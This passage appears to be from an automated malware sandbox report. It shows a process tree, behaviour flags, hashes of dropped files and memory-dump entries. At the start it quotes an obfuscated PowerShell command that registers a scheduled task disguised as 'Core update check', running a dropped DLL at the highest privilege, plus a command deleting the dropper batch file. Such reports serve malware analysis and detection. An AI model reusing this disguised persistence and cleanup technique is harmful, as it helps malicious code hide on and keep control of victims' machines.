C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe function lXaTHPIMgDeIVvlfqHA ($nARswVhMRcfL){ $SfuFUBdulKOIhfkjXUL = 'Core update check'; $yIeGITfeyZCr = @{ Action = (New-ScheduledTaskAction -Execute "Rundll32.exe" -Argument ' C:\Users\Admin\AppData\Local\Temp\0397ase.dll,DllRegisterServer'); Trigger = (New-ScheduledTaskTrigger -Once -At(Get-Date).AddSeconds(5)); TaskName = $SfuFUBdulKOIhfkjXUL; Description = 'Core updating process.'; TaskPath = 'UpdateCheck'; RunLevel = 'Highest'}; Register-ScheduledTask @yIeGITfeyZCr -Force}; lXaTHPIMgDeIVvlfqHA C:\Users\Admin\AppData\Local\Temp\0397ase.dll8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c del "C:\Users\Admin\AppData\Local\Temp\lxpwR.bat"8⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Windows\system32\Rundll32.exeRundll32.exe C:\Users\Admin\AppData\Local\Temp\0397ase.dll,DllRegisterServer1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD545c815f0a0e10f75c450369e5b8673f9
SHA1b3f8e50200afefd0e4c271c3de84ef4d93c5f6c9
SHA2564bd75d9f94626d1a4b514515dfa9c1abfca3d5a1a36f4d1f0dfb8489db453a97
SHA5120120c1f3c501c0630c931f873794f6c7ef1e87216b95aaf76479dfff1614020a7de38c62a24f92a82ae1b0a55b041308d24390b6f556c62d535bef938e4f6974
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57224298af316ab030a6ea7b29e69915d
SHA1c73b3f8af0647472461d4746f9edf2153b754bd0
SHA256c869d981719dc133b2e2dba5cfc9925ce9b327dbf079a18b8b6caa77716e1f87
SHA5125ae6512f693439759dfc913af7db37395fba2216c1b87bf5b6788a39f01a7c22f6daac0c2ccb680c552d431ed5806a344358a2e1856045a2efad43f0059ad099
-
C:\Users\Admin\AppData\Local\Temp\0397ase.dllFilesize
702KB
MD59b692f43d575acb739decfc809db7f2e
SHA1bc42c60590cb908e765e2d97e8b3a92b4616cd30
SHA2560581f0bf260a11a5662d58b99a82ec756c9365613833bce8f102ec1235a7d4f7
SHA512f99f546940bd96c6e9cac6a8500f25280ed190b9830247a5c7249d30a40fd1b4e3c94ca0455e337e77682a7a2b14a259b0aa4cf9680e9ccf727f71ae69873473
-
C:\Users\Admin\AppData\Local\Temp\0397ase.dllFilesize
702KB
MD59b692f43d575acb739decfc809db7f2e
SHA1bc42c60590cb908e765e2d97e8b3a92b4616cd30
SHA2560581f0bf260a11a5662d58b99a82ec756c9365613833bce8f102ec1235a7d4f7
SHA512f99f546940bd96c6e9cac6a8500f25280ed190b9830247a5c7249d30a40fd1b4e3c94ca0455e337e77682a7a2b14a259b0aa4cf9680e9ccf727f71ae69873473
-
C:\Users\Admin\AppData\Local\Temp\DeepL_Logo_darkBlue_v2.svgFilesize
1KB
MD5777a20dc2f64eeb9195fb25113a3e7ac
SHA1d6f8ffdd1f8caad4a978e621ae344a9fa5ba0313
SHA25671df5c84f31125f2f585a82489a570efb6fb371c6ca2b8c1deabca4463e601ba
SHA512216020d3f7325e717113ac85729cbbf99286c26124b2f7e422271867870a96eeb35548b91a1aee89cd8ff1102c526fe8fb1842ef408b18801673d17d418b8595
-
C:\Users\Admin\AppData\Local\Temp\lxpwR.batFilesize
714B
MD5c89f63062141bea640be6864ba85f57f
SHA1dce355e580893996f4df0753785f975fb7801d7e
SHA25628770f2c402d52622b2a1ce5ee07aeb75071196a3699054af780766b6a3b1125
SHA512773ec4a25afc690f2be3816544fe7718631c28be5d53c3b255b3466db270338f01829d1bd841536ef59d5f973e0eaf3e8a20fa8f22da9c137a295761d5da862b
-
\??\pipe\LOCAL\crashpad_1544_JVLPPMHJQQBPALHYMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1020-164-0x0000000000000000-mapping.dmp
-
memory/1264-138-0x00007FFA0DD10000-0x00007FFA0E7D1000-memory.dmpFilesize
10.8MB
-
memory/1264-135-0x0000000000000000-mapping.dmp
-
memory/1312-153-0x0000000000000000-mapping.dmp
-
memory/1324-182-0x0000000000000000-mapping.dmp
-
memory/1452-140-0x0000000000000000-mapping.dmp
-
memory/1544-139-0x0000000000000000-mapping.dmp
-
memory/1888-169-0x0000000000000000-mapping.dmp
-
memory/2160-185-0x0000000000000000-mapping.dmp
-
memory/2820-155-0x0000000000000000-mapping.dmp
-
memory/2996-170-0x0000000000000000-mapping.dmp
-
memory/3200-160-0x00007FFA0DD10000-0x00007FFA0E7D1000-memory.dmpFilesize
10.8MB
-
memory/3200-158-0x0000000000000000-mapping.dmp
-
memory/3216-166-0x0000000000000000-mapping.dmp
-
memory/3252-173-0x0000000180000000-0x0000000180009000-memory.dmpFilesize
36KB
-
memory/3576-167-0x0000000000000000-mapping.dmp
-
memory/3684-143-0x0000000000000000-mapping.dmp
-
memory/3792-142-0x0000000000000000-mapping.dmp
-
memory/3968-162-0x0000000000000000-mapping.dmp
-
memory/4300-131-0x000002ABC07A0000-0x000002ABC07C2000-memory.dmpFilesize
136KB
-
memory/4300-133-0x00007FFA0E470000-0x00007FFA0EF31000-memory.dmpFilesize
10.8MB
-
memory/4300-130-0x0000000000000000-mapping.dmp
-
memory/4432-145-0x0000000000000000-mapping.dmp
-
memory/4440-180-0x0000000000000000-mapping.dmp
-
memory/4516-168-0x0000000000000000-mapping.dmp
-
memory/4544-154-0x0000000000000000-mapping.dmp
-
memory/4772-148-0x0000000000000000-mapping.dmp
-
memory/4776-150-0x0000000000000000-mapping.dmp
-
memory/5012-132-0x0000000000000000-mapping.dmp
-
memory/5040-157-0x0000000000000000-mapping.dmp
-
memory/5108-183-0x0000000000000000-mapping.dmp